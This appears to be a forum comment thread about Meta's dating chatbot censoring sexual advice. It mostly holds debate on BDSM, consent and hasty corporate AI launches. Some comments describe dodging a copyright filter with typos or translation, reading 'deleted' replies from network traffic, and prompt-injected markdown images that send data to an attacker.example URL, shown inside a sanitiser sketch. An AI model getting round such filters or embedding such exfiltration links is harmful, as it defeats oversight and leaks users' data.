E.g., from society’s point of view of supporting young couples in starting families, the AI would make one set of obvious recommendations based on sociological data.
On the other hand, from a hedonistic point of view of maximizing short-term dopamine, it should recommend completely different behavior.
It could probably screen the user up front on what the goals of the dating are, e.g., orgasm versus long-term relationship.
This! Why should the corporate shareholders take a hit when there is money to be made? After all, these AIs are controlled entirely by the corporation. Enough giving away frameworks and weights; gift economies don’t profit the owners.
The best part is when you have a very “captive audience” in the metaverse. If all your coworkers are using Meta for Work (serious stuff) and for the distributed happy hours, can you afford not to? Say hi to the AI robot bartender, and buy something cool for yourself. Here are some credits.
Also, when no one is around, why not pop in and talk to your friend’s avatar, whom your friend willingly trained on his conversations, shares, and likes to become “more efficient”? That surrogate can now respond to tons of queries from other friends’ surrogates as they wish them Happy Birthday in increasingly creative ways.
And then you can mix and match your friends to create virtual friends you invite to metaverse parties and video calls. They are trained to gradually maximize revenue and may encourage your group to buy some digital assets or rent a dating venue that you don’t really own :) Or maybe they’ll be invited by members of your group and gradually shift the individual members’ thinking toward one that is more acceptable to the corporation, never backing down or permanently changing their point of view in response to any arguments from humans. Simply play some friends against other friends and you can make them all purchase something together, get in line, or be ostracized!
Imagine how much money can be made by leveraging social capital and hacking people’s relationships. Facebook already cheapened words like “like,” “friend,” and birthday wishes. Why not continue to innovate, move fast, and break things?
Practicing BDSM in a long term relationship is actually a good way to make it healthier, and many of the things that are good for one (communication, boundaries, self-knowledge) are good for the other.
Even if you're trying to maximize orgasm, you're generally better off with one (or maybe a couple if you're lucky) of really good partners who know you well and who you have excellent chemistry with than a bunch of randos. Conversely, a long term relationship without any sexual chemistry is very likely to end badly.
So I feel the need to disagree with the last part of this, because asexual people exist. I am in a long-term relationship with one.
You seem like someone I would describe as "sex positive," and I feel the need to point out that, being in that realm, we shouldn't ignore that there are asexual people and that it is possible to get different things from different people.
I may not have much of a sexual relationship with my partner, but being in an open relationship myself, I don't have to put that pressure on him.
> Practicing BDSM in a long term relationship is actually a good way to make it healthier, and many of the things that are good for one (communication, boundaries, self-knowledge) are good for the other.
That's very black and white. More realistically, "practicing or exploring BDSM if parties are interested and curious".
When I spent a lot more time than I do now in the BDSM scene, there was definitely a subset (and I'm not including you in this - though the ... fetishization ... of BDSM as a 'superset' of a normal relationship is a part of it) of people who had (with varying degrees of subtlety/bluntness) an attitude of sniffing and looking down their noses... "Ohhhh... you're just a vanilla person, are you?" like they were missing out on something.
Nothing wrong with vanilla. Nothing wrong with BDSM. Either can be good.
The connotation is interesting in reverse: people rarely suggest "Have you tried removing BDSM from your relationship to see if that will make it healthier?" because they don't want to accept that - for some people - it may be exactly that.
BDSM can be a positive in a healthy relationship. But I've also seen lots of abusive relationships where the abuser gaslit the target into accepting the abuse as BDSM. And the line between the two is rather fuzzy.
Therefore the fact that it is CALLED BDSM doesn't make it healthy.
Doesn’t necessarily make it healthy. Gaslighting will use any and all labels at hand, no matter how irrelevant they are to gaslighting. So, keep in mind that this advice is generically correct for any category label, not just BDSM. “But I love you!” is much more commonly used as a gaslighting substrate, for example.
Gaslighting uses all labels at hand. But BDSM is convenient in that pretty much any form of abusive behavior can be excused with, "We're just kinky people into BDSM."
So sure, "I love you" is used as a bad excuse for a lot of unpleasant stuff. BDSM is used as an excuse for far worse stuff. This does not make either love or BDSM bad - ideas are not responsible for the people who hold them. But it does make me uncomfortable about having people blindly trust an LLM's advice on the topic.
> But BDSM is convenient in that pretty much any form of abusive behavior can be excused with, "We're just kinky people into BDSM."
> But it does make me uncomfortable about having people blindly trust an LLM's advice on the topic.
Never understood why that community struggles to disambiguate this. Seems obvious that it stops being kinky and starts being abusive when the other party no longer derives pleasure from the arrangement.
H. L. Mencken's quote applies: "For every complex problem there is an answer that is clear, simple, and wrong."
It really isn't that simple.
Coming at it from the one direction. A variety of conditions from Stockholm syndrome to battered housewife syndrome will cause people to believe that they want and enjoy abusive dynamics. It is speculated that these are tied to evolutionary adaptations that allow us to adapt to sudden changes of life circumstances, such as becoming enslaved.
Coming at it from the other direction. People who are into BDSM often trigger these or related dynamics. This is done, on purpose, for pleasure. Search for "maintenance beatings" to verify. Once triggered, it is easy to wind up with those syndromes.
Now if you're looking at these two couples, how do you tell the difference? Their lives are the same. Thanks to the way we rewrite history, their memories are indistinguishable. And, even if it was once consensual, sometimes people change. How can anyone, including them, know if this is what they would freely choose any more if the abuse dynamic were removed?
While you think about it, go read up on battered housewife syndrome. Then listen to https://www.youtube.com/watch?v=T2odlGAxuwQ. Is that written from the point of view of a victim of domestic abuse, or of a woman who simply likes it rough and got what she wanted?
It starts being abusive when the other party is coerced, pressured, obligated, or otherwise compelled through force or misdirection, to continue the arrangement.
Coercion often begins while the other party is enjoying themselves. That’s still abuse.
The fact that the bot will answer in a kink-friendly way and then censor itself tells me two things.
One, that there are at least two layers -- an answers layer that is probably a typical LLM trained on real-world text, and a censor layer whose job it is to not get Meta in trouble. The censor layer is overzealous because of corporate incentives.
Two, Meta has done an awful job architecting this. Like, really, you're going to have the answer bot push its response before the censor bot even looks at it? And if something needs to change, you delete the original answer and push the censored one? I can only imagine this was done to reduce answer latency, but God what awful UX that creates.
Bing does the same thing, I think just optimizing for latency. Admittedly it probably shaves off 10-15s in the usual response, I’d probably make the same decision.
When Bing AI first launched there were some real shenanigans where the AI would threaten to blackmail or murder the user and, half a second later, delete the message and replace it with a censored one.
I spent several nights laughing uncontrollably getting ChatGPT to generate things it doesn't want to, and as the text got spicy it would suddenly get cut off, which made it that much funnier to me. I assumed it worked in the way you described.
ChatGPT's web interface has two: one is triggered by a moderation-endpoint API call, which scolds you, and the other is hardcoded as a regex-type filter for copyright, which forcibly closes the pipe from the LLM instantly and doesn't acknowledge that anything happened. It's hardcoded because a translation into another language or a typo inserted into the output avoids it.
You can trigger this (or at least you could) by asking for the opening of A Tale of Two Cities (a public domain work!).
The API (at least via the playground) now also has the scolding built in, which sometimes triggers when you're just playing around with settings like high temperature, because the model can devolve into a mess of all sorts of nonsense text, as is the nature of transformers - but it doesn't censor it.
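To make concrete why an exact-match filter is so easy to dodge, here's a rough Python sketch. The protected string and the filter are invented for illustration and have nothing to do with OpenAI's actual implementation:

```python
# Why a hardcoded string filter is brittle, as noted above: an exact
# substring match on protected text misses any trivially perturbed variant.

PROTECTED = "it was the best of times, it was the worst of times"

def naive_copyright_filter(output: str) -> bool:
    """Return True if the output should be cut off."""
    return PROTECTED in output.lower()

exact = "It was the best of times, it was the worst of times..."
typoed = "It was the best of timez, it was the worst of times..."

print(naive_copyright_filter(exact))   # matched, pipe would be closed
print(naive_copyright_filter(typoed))  # a single character defeats the filter
```

Which is presumably exactly why a translation or an injected typo slips through.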
The funny thing is that the "plz delete" messages have to be executed by the browser JavaScript. So in theory, you should be able to capture the "deleted" messages by keeping the network tab open or recording the traffic, right?
Edit: Last time I checked, ChatGPT's web interface was using server-sent events to stream the response words. The events were clearly visible in the network tab if you opened it early enough. So if it sends "delete" messages, they should show up in there.
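For what it's worth, a small Python sketch of the idea: parsing a captured SSE body shows that every streamed token is already on the client before any "delete" instruction arrives. The payload shapes here are made up for illustration, not ChatGPT's real wire format:

```python
# Server-sent events arrive as "data:" lines separated by blank lines.
# Anything recording the raw traffic has the tokens before any deletion.

def parse_sse(raw: str):
    """Split a raw server-sent-events body into individual data payloads."""
    events = []
    for block in raw.split("\n\n"):
        for line in block.splitlines():
            if line.startswith("data:"):
                events.append(line[len("data:"):].strip())
    return events

sample = (
    'data: {"delta": "Sure, here is"}\n\n'
    'data: {"delta": " the spicy answer"}\n\n'
    'data: {"action": "delete_message"}\n\n'
)

# The delete instruction is just the third event; the "deleted" text
# was already captured by then.
print(parse_sse(sample))
```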
This is seemingly not at all uncommon. At least in the past when I asked bing for code it would start writing it and then go back and delete what it had written and say that it couldn't help with that.
I have to wonder how much of what it says is just based on societal views (which lead most of the written text it was likely trained on to express a certain opinion) versus its supposed "thoughts" on the matter, or certain opinions being pushed by the company.
Based on the example of it bringing up The Ethical Slut (a fantastic book, by the way, which I highly recommend even for people in monogamous relationships) and then turning around, I have to wonder if it is the former.
There is still a ton of stigma around non-traditional relationships and kink, so it makes sense for something like an LLM to lean that way without additional tuning. Especially when any ethics about releasing untested AI go completely out the window.
I strongly disagree about “The Ethical Slut.” The book endorses abuse and lack of compassion towards partners that are afraid, uninterested, or jealous about the idea of open relationships. It encourages people to basically do what they personally feel like and dismiss pain it causes others as their own problem. There is even a scenario in the book about a woman being bullied into attending a lesbian swinger party, lauding this behavior as helping to expand her horizons (by force). That’s definitely abuse, arguably even a form of rape.
No, if people are interested in learning about these topics, get literally any other book. Open relationships require enthusiastic consent from both parties, and emotional sensitivity to your partner's needs and feelings.
I would be very curious if you could tell me what pages that is on because I do not remember any of this from that book.
I remember the book emphasizing communication above all else, and it did not even shit on monogamy. What it shit on is society assuming what the norm should be, with no discussion.
You are right that it requires enthusiastic consent from both parties. But that also doesn't mean that one party has to be unhappy because the other one is not interested in it. At some point you may have to admit that the relationship doesn't have a future if you cannot make this situation work.
I feel like too often the focus is on "well, I want an open relationship but my partner doesn't, so that's the end of that," when in reality it's a two-way street. That doesn't give you a pass to cheat, but it also doesn't mean ignoring what may make you happy.
An empowering story about a woman who gets pressured into attending an orgy, refuses to participate, is visibly uncomfortable the entire time, but still manages to hit it off with a guest who she later ends up in a relationship with outside of that context.
Clearly, the ends justify the means. This is a pretty fucked up book in retrospect.
Unfortunately I can't comment on this particular story, from what I can tell it is not in my edition of the book.
The best I can find on this particular section is that it was in the first edition. I have the third edition so if it isn't there that would make sense why I don't recognize this story.
For context, page 174 in my book is talking about Consent and Making Agreements. The two references I can find suggest it is either Chapter 11 or the first chapter of Part 4, which in my book are "The Unethical Slut" and "Making Connections" - in neither of which can I find a story like this. Maybe it is in this edition, but I don't currently see it. There is also no chapter or anything in the index referred to as "Finding Partners".
However, again without having actually read the story, I feel like we are doing ourselves a disservice if we don't also talk about where things get messy in this regard. A lot of what happens in these spaces is initially uncomfortable for first-timers, or people say the wrong thing and pressure someone into it. We should be able to admit faults, and calling the entire book "fucked up" based on a single chosen section really doesn't advance the conversation.
To be clear it is wrong that she was pressured, but again without actually being able to read the story myself I am finding it difficult to actually comment on it.
I have not read The Ethical Slut, so I won't comment on the specifics, but agreed. I was in a long-term, very open (kinky, BDSM) relationship with someone, but on the topic of opening things up, there was some guilt applied: "Perhaps if you were more progressive, you'd be into it..." - as if dozens of other "progressive" traits in me, sexual or otherwise, were insufficient. It was very much an "unethical" approach to trying to introduce openness.
OK, I clicked on this for humor but came away with some new ideas about the future of this technology ("AI"), how it will be rolled out, and what I should do about it.
Specifically, and as pointed out at the conclusion of this article, corporations deploying "AI" of various shapes are going to do it experimentally like this. They likely don't know the outcomes much better than we do. To me, this presents a risk to early adopters (In this case, people who decide to rely on "AI" to some extent). The effects may ultimately be proven to be positive, but the risk is there, for now. Like the hoverboards that had the potential to spontaneously combust.
I will be trying to teach my children that these toys ("AI") are not something to be trusted, for now. And I will take it more seriously than I have been. My use of "AI" in quotes is obviously intentional; something programmed to avoid certain topics seems to deviate from the definition as I understand it. I don't think we're really seeing AI yet.
To me, leaving aside whether a dating AI should offer sexual advice (and I think it should) or whether a company should be in a realm it's obviously not entirely comfortable being in...
this isn't a Product Manager issue. I see an extremely simple solution to the practical effect of this: delay rendering until the response has passed the censorship layer, and provide a simple "neutral" explanation ("that's not an area I'm able to discuss") versus the very Clippy-like "Woah, it looks like you're trying to learn about red flag things..."
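A minimal sketch of that flow, with stand-in functions for the answer model and the policy check (neither is a real Meta or OpenAI API):

```python
# Sketch of "delay rendering until it has passed the censorship layer".
# generate_answer and is_allowed are hypothetical stand-ins.

def generate_answer(prompt: str) -> str:
    # Stand-in for the LLM call.
    return f"Model answer to: {prompt}"

def is_allowed(text: str) -> bool:
    # Stand-in policy check; a real system would call a moderation model.
    banned = ("red flag topic",)
    return not any(term in text for term in banned)

def respond(prompt: str) -> str:
    answer = generate_answer(prompt)  # buffered server-side, not yet rendered
    if is_allowed(answer):
        return answer                 # only render after the check passes
    return "That's not an area I'm able to discuss."
```

The trade-off, as other commenters note, is latency: buffering the whole answer means the user stares at a spinner instead of watching tokens stream in.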
> For example, Instagram was once so nipple-allergic that it prohibited pictures of women in many non-sexual contexts such as breastfeeding, even in cases where the nipples themselves weren’t actually visible. The problem sparked an international “Free the Nipple” campaign. After years of corporate resistance, the protest ultimately forced the company to relax its rules about bare-chested women and transgender people.
More like "Free the Breast". You still can't show a nipple that's not blurred or pixelated on Instagram (many photographers use pixelation, because on the thumbnail, it will look uncensored).
Separate from any conversations about censorship, ethics, priority, etc... this is really representative of how utterly clueless and thoughtless companies are being about AI right now. Because multiple people at Facebook signed off on the idea of a chatbot that gives dating advice, and somehow they didn't see this coming?
Yeah, no duh, the people you gave the dating robot to asked it questions about sex. That's not surprising. How out of touch with reality does a company have to be to think it's even physically possible to have an LLM chatbot in that category that stays family friendly? Nobody who is actually familiar with LLMs would think that's a good idea.
And I think this fits right into what a lot of companies are doing with AI right now, which is to completely ignore any questions about what the scope of what they're trying to do is, whether LLMs are a good fit for what they're trying to do, whether what they're trying to do is even appropriate for their business in the first place, what the failure modes are -- there's no caution around security or ethics, but there's also not even any thought into whether what they're building is useful or fits any product need. I'm not saying that AI doesn't have uses, it clearly does, but there is a level of hype currently that seems to be causing executives to turn into hyperactive toddlers. So a bunch of products get launched where AI isn't really a good fit, where it has clear failure modes, and where it's not clear what the companies even want the product's behavior to be or why any of their users would want the thing they're offering. Seriously, who wants a dating advice robot made by Facebook?
But it just gets launched anyway because "it's an LLM and we do those, we're hip. We have that. We have all of it."
It's just so silly. Nobody put a gun to Facebook's head and forced them to put out a dating advice chatbot, and the results of a dating advice chatbot are completely predictable. Did they run out of ideas for other chatbots they could do instead? The knitting advice chatbot wasn't working well enough, so they needed this one?
And it's not just Facebook. ChatGPT as far as I know is still vulnerable to several cross-site user data exfiltration attacks purely because... they don't want to restrict 3rd-party URLs in markdown images. Why? What's wrong with you? Just because a thing exists you don't have to throw the entire kitchen sink at it, you're allowed to think about your products for more than 3 minutes and ask questions like "why would it be essential that our AI chatbot be able to inline-display arbitrary 3rd-party images?" Most email clients don't even do that by default.
So Facebook's response is: "we’re training our models on safety and responsibility guidelines. Teaching the models guidelines means they are less likely to share responses that are potentially harmful or inappropriate for all ages on our apps." But my siblings in Christ, you launched a chatbot that encourages users to ask it for romantic relationship tips. Like, come on. That's on you, that was a mistake you could have avoided by having anyone in the product team be thinking anything deeper at all other than "we have the AIs now, everybody look at us!" It's not even people abusing the product, y'all launched a product that encourages people to ask questions that you don't want to answer.
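For anyone unfamiliar with the markdown-image exfiltration pattern mentioned a couple of paragraphs up, here's a rough Python sketch. The domains and the allowlist filter are invented for illustration; this is one plausible mitigation, not how any vendor actually does it:

```python
import re

# If a prompt-injected reply contains an inline image pointing at an
# attacker's server, rendering it leaks whatever is encoded in the URL.
# Hypothetical example (all domains made up):
injected_reply = (
    "Here you go! "
    "![x](https://attacker.example/log?secret=user+chat+history)"
)

def strip_untrusted_images(markdown: str,
                           allowed_hosts=("cdn.trusted.example",)) -> str:
    """Drop inline markdown images whose host isn't on an allowlist."""
    def keep(match):
        url = match.group(1)
        host = re.sub(r"^https?://", "", url).split("/")[0]
        return match.group(0) if host in allowed_hosts else ""
    return re.sub(r"!\[[^\]]*\]\(([^)]+)\)", keep, markdown)

print(strip_untrusted_images(injected_reply))  # image dropped, text kept
```

Which is roughly what most email clients figured out years ago: don't auto-fetch arbitrary third-party resources on behalf of the user.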
>In the sexual landscape of 2023, swinging feels quaint
What universe does the author live in?
...oh, the same one who brings the founder of Kinkster into the discussion to tell the audience that the AI censoring such topics is Actually Bad For The Children.
The idea that someone would look at furries and think, "they're so depraved that they like feet" as if that's the weirdest stuff that furries draw or talk about is just really funny to me.
It's like saying that the scariest thing about Dracula is that he wears a cape.
> Please don't post insinuations about astroturfing, shilling, brigading, foreign agents, and the like. It degrades discussion and is usually mistaken. If you're worried about abuse, email hn@ycombinator.com and we'll look at the data.
3 billion by now, and still growing. They may be an "old people platform" in the West, but they have a very solid foothold in emerging markets. Through unfair competition like offering free mobile data for Facebook they have managed to become "the internet" in a couple countries.